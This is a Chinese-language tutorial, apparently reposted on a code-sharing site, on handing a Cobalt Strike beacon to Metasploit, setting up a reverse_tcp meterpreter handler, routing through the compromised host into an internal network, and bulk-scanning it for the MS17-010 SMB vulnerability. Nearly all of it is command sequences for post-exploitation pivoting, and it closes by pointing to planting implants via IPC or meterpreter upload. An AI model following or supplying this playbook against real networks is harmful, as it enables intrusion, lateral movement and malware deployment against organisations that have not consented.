cs配合msf批量探測內網MS17-010漏洞


第一步

Cobalt strike 派生 shell 給 MSF(前提有個beacon shell)

 

 

 

第二步

選擇要派生的beacon,右鍵-->增加會話,選擇剛剛配置的foreign監聽器

第三部 msf

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

 

 

 第四步添加路由

如果在meterpreter中

run get_local_subnets 查看目標內網路由
run autoroute -s 100.0.0.0/8   #(根據目標內網網絡而定)  添加路由
run autoroute –p

一般來說,在meterpreter中設置路由便可以達到通往其內網的目的。然而有些時候還是會失敗,這時我們可以background返回msf>,查看下外面的路由情況。

 

 如果沒有路由規則 那么可以在msf中

msf>route add 10.0.0.0 255.0.0.0 1
說明:1表示session 1,攻擊機如果要去訪問10.0.0.0/8網段的資源,其下一跳是session1,至於什么是下一條這里不多說了,反正就是目前攻擊機可以訪問內網資源了。

然后

 

 

連接postgresql數據庫,不連接的話掃描的信息的信息無法入庫。連接上后可通過db_status查看狀態。

Kali linux:

首先啟動數據庫:service postgresql start

啟動msfsploit服務:service metasploit start

啟動msfconsole:msfconsole

使用db_status確認數據庫是否正確連接

如果默認沒有鏈接的話可以先自己裝一個postgresql數據庫,然后新建一個名為msf的庫,在msf中執行命令連接:db_connect postgres:123456@127.0.0.1:5433/msf

 

第三步:運行smb模塊探測主機445端口開放情況。

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.236.129/24
set threads 16
run

 

 掃描完成后,掃描的信息會自動存入數據庫,可通過hosts命令查看

 

 

 

 第四步:使用smb_ms17_010模塊探測MS17-010漏洞

use auxiliary/scanner/smb/smb_ms17_010
show options
set threads 16
services -r tcp -p 445 -R
run

 

 

 

 

 然后就是一系列的上馬這些操作了 可以ipc也可以msf的upload

 

 

 

 

文獻參考

https://www.cnblogs.com/backlion/p/9484949.html msf命令操作

https://www.4hou.com/tools/4765.html

https://bbs.ichunqiu.com/thread-53044-1-1.html cs

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM